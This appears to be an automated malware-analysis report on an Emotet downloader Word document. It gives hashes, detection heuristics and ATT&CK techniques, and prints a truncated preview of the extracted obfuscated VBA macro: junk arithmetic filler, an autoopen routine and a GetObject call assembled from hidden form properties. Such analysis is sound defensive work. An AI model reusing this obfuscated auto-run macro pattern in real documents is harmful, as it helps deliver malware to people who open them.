Emotet Office (OLE) malware analysis — malicious · a232af0c3f002cd8

MALICIOUS

Office (OLE)

175.5 KB Created: 2019-03-28 07:34:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: cf35aadddcdddbacec25028b5b93f045 SHA-1: 14f39e31b5c26709232b659c07ddf3c8e807ac0c SHA-256: a232af0c3f002cd836681fd5a0390a0f1c59ebf19ff49f4b31fb7462610cfcd2

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file exhibits high-severity heuristics for legacy WordBasic and VBA macros, including an AutoOpen function and GetObject calls, strongly indicating malicious intent. ClamAV detection confirms this, identifying it as Doc.Downloader.Emotet-6915305-0. The VBA script is heavily obfuscated, but the presence of macro execution and downloader indicators suggests it is designed to fetch and execute a secondary payload, consistent with Emotet's typical behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6915305-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6915305-0
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25675 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25675 bytes
SHA-256: `5b57594b420b797391389a3649cc7497ec1e394e770f02bc2497b34689f9d83a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jooZAAQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ZU1xZD" Attribute VB_Base = "0{83BF4707-3F24-4183-857C-7B12177EED94}{1909587A-C4B5-43A2-88BC-325096C60567}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "kAAAAA_U" Attribute VB_Base = "0{E0A2B2AB-D852-4A19-9A5D-F661CC51EDA8}{2F4E8E74-7827-4642-BA64-B5D76A42AA96}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "i_BAXA" Function uw4AcDX() If DUkkwQ = XDGDAox Then kAQ4wXBU = (235556788 - zABDAQAA * FBADZ4 * CDate(938795689)) v1cA_BwU = cUcAA_ / Oct(dDQDBA) - PwAABAA * CDbl(397489556) / AAUwADc * Fix(233936086 * Log(FCAooDDc)) / lDZoQxAD * Chr(621319222) * 922619092 * Sgn(wU_UBAA / Log(476854112)) End If If fAZUUBAA = iwXAXA Then CoQ4c_ = (709593237 - dAA_AAA4 * iGUXGA * CDate(400110449)) ToAc_GU = AAxG_ADZ / Oct(aQABQ1Q) - jDABXAo * CDbl(892960113) / zAADx4Zx * Fix(915305922 * Log(rXXBQQk)) / jCxQGBAA * Chr(846108883) * 527521756 * Sgn(WAXQAU / Log(241148660)) End If If TCUBCUGw = T_AUkZ Then jXDcAkA = (877222339 - TAcZAw * ocDQAA_ * CDate(182867707)) mAXkBA4 = TA1UDo_ / Oct(QoBBQUAw) - XCQBAx * CDbl(145539558) / MAUADU * Fix(254373412 * Log(dxG1BGB)) / HA_U4QQ * Chr(97729511) * 582456236 * Sgn(hUCCA4 / Log(714752817)) End If If mD_AGA = nAAADAG_ Then BAZUAA = (121556851 - JGBxA_ * qZoAUAx * CDate(297369654)) Kk4kQx = u4Akw1XA / Oct(JUBAQU) - oBAD_kAc * CDbl(920085024) / DABUABc * Fix(222807042 * Log(iw_BQk)) / w4oAAw_U * Chr(792208741) * 108921259 * Sgn(MDBAAA / Log(604241754)) End If If ZQAcwAD1 = pAUkGc Then XZ_QADA = (331181219 - JAUXDD * ZAAAXDQ * CDate(686442739)) SXGACAB = lUQAoC / Oct(LA4UAw) - NAXADck * CDbl(903749758) / HUA1AAcA * Fix(191064247 * Log(tAAXcBAB)) / w4QU1A * Chr(65807350) * 831082313 * Sgn(hcAQAXA / Log(771417014)) End If If JAZQxQAD = vcQcw_ Then c4CD41DA = (216452676 - ZBAXQA * OAABA4AA * CDate(498601541)) vwoXcoCk = X1AXAU / Oct(pQBAAQ) - mk_B_B_ * CDbl(448687516) / jUA1AAAA * Fix(832843724 * Log(hGw1AUQA)) / EX_kAAU * Chr(722333304) * 872992297 * Sgn(ZXQAAZCA / Log(838024670)) End If If aABAAZA = fADDkAw Then OxAcAA4c = (843573593 - lAAAA1AU * qAUDBZAw * CDate(935670127)) VDAUUQA = OGA_oo / Oct(WAcBCx) - bAAGAQAA * CDbl(525877038) / OGCQAxA * Fix(641409815 * Log(wZcxxQkA)) / CBZXAoU * Chr(31558628) * 512079559 * Sgn(wBwwAZx / Log(861579552)) End If If jBwAooUG = IAZUXA Then S4AxAX = (139405056 - dA_wcUAA * YAAB1_A * CDate(558321715)) pQkDwAGZ = CXBcAQ_ / Oct(bXoXZx) - okQAAAA * CDbl(92688819) / TcGAAw_Q * Fix(287661511 * Log(jQxAUXAA)) / DkooDDw * Chr(413344851) * 736504179 * Sgn(GcAcZQDG / Log(712957930)) End If End Function Sub autoopen() On Error Resume Next If zQ1AGDUA = bAAAxAA Then ZXAwUAo4 = (726693920 - IAUAD4B * aCUDBA * CDate(510912578)) TBAxX_ = dABAAGB / Oct(nAD1Aw) - MQZBDDB * CDbl(693134375) / GZABA1x * Fix(27778498 * Log(aA1koAB)) / BCAwDC * Chr(924844580) * 249414303 * Sgn(rxk_AA / Log(686878550)) End If If kDBXZUX = YXkAwZBA Then JAXDUQB = (888232537 - CQABQA * s4QAUXGA * CDate(202978636)) iDAwAD = AAAABDw / Oct(v1Q4BBoB) - McUkB44A * CDbl(947073108) / bZAkGBA * Fix(677800470 * Log(IBcDA_)) / NxAAAZQ4 * Chr(36548213) * 853267047 * Sgn(h1ZkDQ / Log(715878846)) End If Set FABQ4A = GetObject(ZU1xZD.ZZUUAx + kAAAAA_U.i_k1B_ + ZU1xZD.ZZUUAx.Tag) If LoQBXX = pZUUCAB Then ... (truncated)

SHA-256: 5b57594b420b797391389a3649cc7497ec1e394e770f02bc2497b34689f9d83a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jooZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZU1xZD"
Attribute VB_Base = "0{83BF4707-3F24-4183-857C-7B12177EED94}{1909587A-C4B5-43A2-88BC-325096C60567}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "kAAAAA_U"
Attribute VB_Base = "0{E0A2B2AB-D852-4A19-9A5D-F661CC51EDA8}{2F4E8E74-7827-4642-BA64-B5D76A42AA96}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "i_BAXA"
Function uw4AcDX()
   If DUkkwQ = XDGDAox Then
         kAQ4wXBU = (235556788 - zABDAQAA * FBADZ4 * CDate(938795689))
         v1cA_BwU = cUcAA_ / Oct(dDQDBA) - PwAABAA * CDbl(397489556) / AAUwADc * Fix(233936086 * Log(FCAooDDc)) / lDZoQxAD * Chr(621319222) * 922619092 * Sgn(wU_UBAA / Log(476854112))
End If
   If fAZUUBAA = iwXAXA Then
         CoQ4c_ = (709593237 - dAA_AAA4 * iGUXGA * CDate(400110449))
         ToAc_GU = AAxG_ADZ / Oct(aQABQ1Q) - jDABXAo * CDbl(892960113) / zAADx4Zx * Fix(915305922 * Log(rXXBQQk)) / jCxQGBAA * Chr(846108883) * 527521756 * Sgn(WAXQAU / Log(241148660))
End If
   If TCUBCUGw = T_AUkZ Then
         jXDcAkA = (877222339 - TAcZAw * ocDQAA_ * CDate(182867707))
         mAXkBA4 = TA1UDo_ / Oct(QoBBQUAw) - XCQBAx * CDbl(145539558) / MAUADU * Fix(254373412 * Log(dxG1BGB)) / HA_U4QQ * Chr(97729511) * 582456236 * Sgn(hUCCA4 / Log(714752817))
End If
   If mD_AGA = nAAADAG_ Then
         BAZUAA = (121556851 - JGBxA_ * qZoAUAx * CDate(297369654))
         Kk4kQx = u4Akw1XA / Oct(JUBAQU) - oBAD_kAc * CDbl(920085024) / DABUABc * Fix(222807042 * Log(iw_BQk)) / w4oAAw_U * Chr(792208741) * 108921259 * Sgn(MDBAAA / Log(604241754))
End If
   If ZQAcwAD1 = pAUkGc Then
         XZ_QADA = (331181219 - JAUXDD * ZAAAXDQ * CDate(686442739))
         SXGACAB = lUQAoC / Oct(LA4UAw) - NAXADck * CDbl(903749758) / HUA1AAcA * Fix(191064247 * Log(tAAXcBAB)) / w4QU1A * Chr(65807350) * 831082313 * Sgn(hcAQAXA / Log(771417014))
End If
   If JAZQxQAD = vcQcw_ Then
         c4CD41DA = (216452676 - ZBAXQA * OAABA4AA * CDate(498601541))
         vwoXcoCk = X1AXAU / Oct(pQBAAQ) - mk_B_B_ * CDbl(448687516) / jUA1AAAA * Fix(832843724 * Log(hGw1AUQA)) / EX_kAAU * Chr(722333304) * 872992297 * Sgn(ZXQAAZCA / Log(838024670))
End If
   If aABAAZA = fADDkAw Then
         OxAcAA4c = (843573593 - lAAAA1AU * qAUDBZAw * CDate(935670127))
         VDAUUQA = OGA_oo / Oct(WAcBCx) - bAAGAQAA * CDbl(525877038) / OGCQAxA * Fix(641409815 * Log(wZcxxQkA)) / CBZXAoU * Chr(31558628) * 512079559 * Sgn(wBwwAZx / Log(861579552))
End If
   If jBwAooUG = IAZUXA Then
         S4AxAX = (139405056 - dA_wcUAA * YAAB1_A * CDate(558321715))
         pQkDwAGZ = CXBcAQ_ / Oct(bXoXZx) - okQAAAA * CDbl(92688819) / TcGAAw_Q * Fix(287661511 * Log(jQxAUXAA)) / DkooDDw * Chr(413344851) * 736504179 * Sgn(GcAcZQDG / Log(712957930))
End If
End Function
Sub autoopen()
On Error Resume Next
   If zQ1AGDUA = bAAAxAA Then
         ZXAwUAo4 = (726693920 - IAUAD4B * aCUDBA * CDate(510912578))
         TBAxX_ = dABAAGB / Oct(nAD1Aw) - MQZBDDB * CDbl(693134375) / GZABA1x * Fix(27778498 * Log(aA1koAB)) / BCAwDC * Chr(924844580) * 249414303 * Sgn(rxk_AA / Log(686878550))
End If
   If kDBXZUX = YXkAwZBA Then
         JAXDUQB = (888232537 - CQABQA * s4QAUXGA * CDate(202978636))
         iDAwAD = AAAABDw / Oct(v1Q4BBoB) - McUkB44A * CDbl(947073108) / bZAkGBA * Fix(677800470 * Log(IBcDA_)) / NxAAAZQ4 * Chr(36548213) * 853267047 * Sgn(h1ZkDQ / Log(715878846))
End If
Set FABQ4A = GetObject(ZU1xZD.ZZUUAx + kAAAAA_U.i_k1B_ + ZU1xZD.ZZUUAx.Tag)
   If LoQBXX = pZUUCAB Then

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.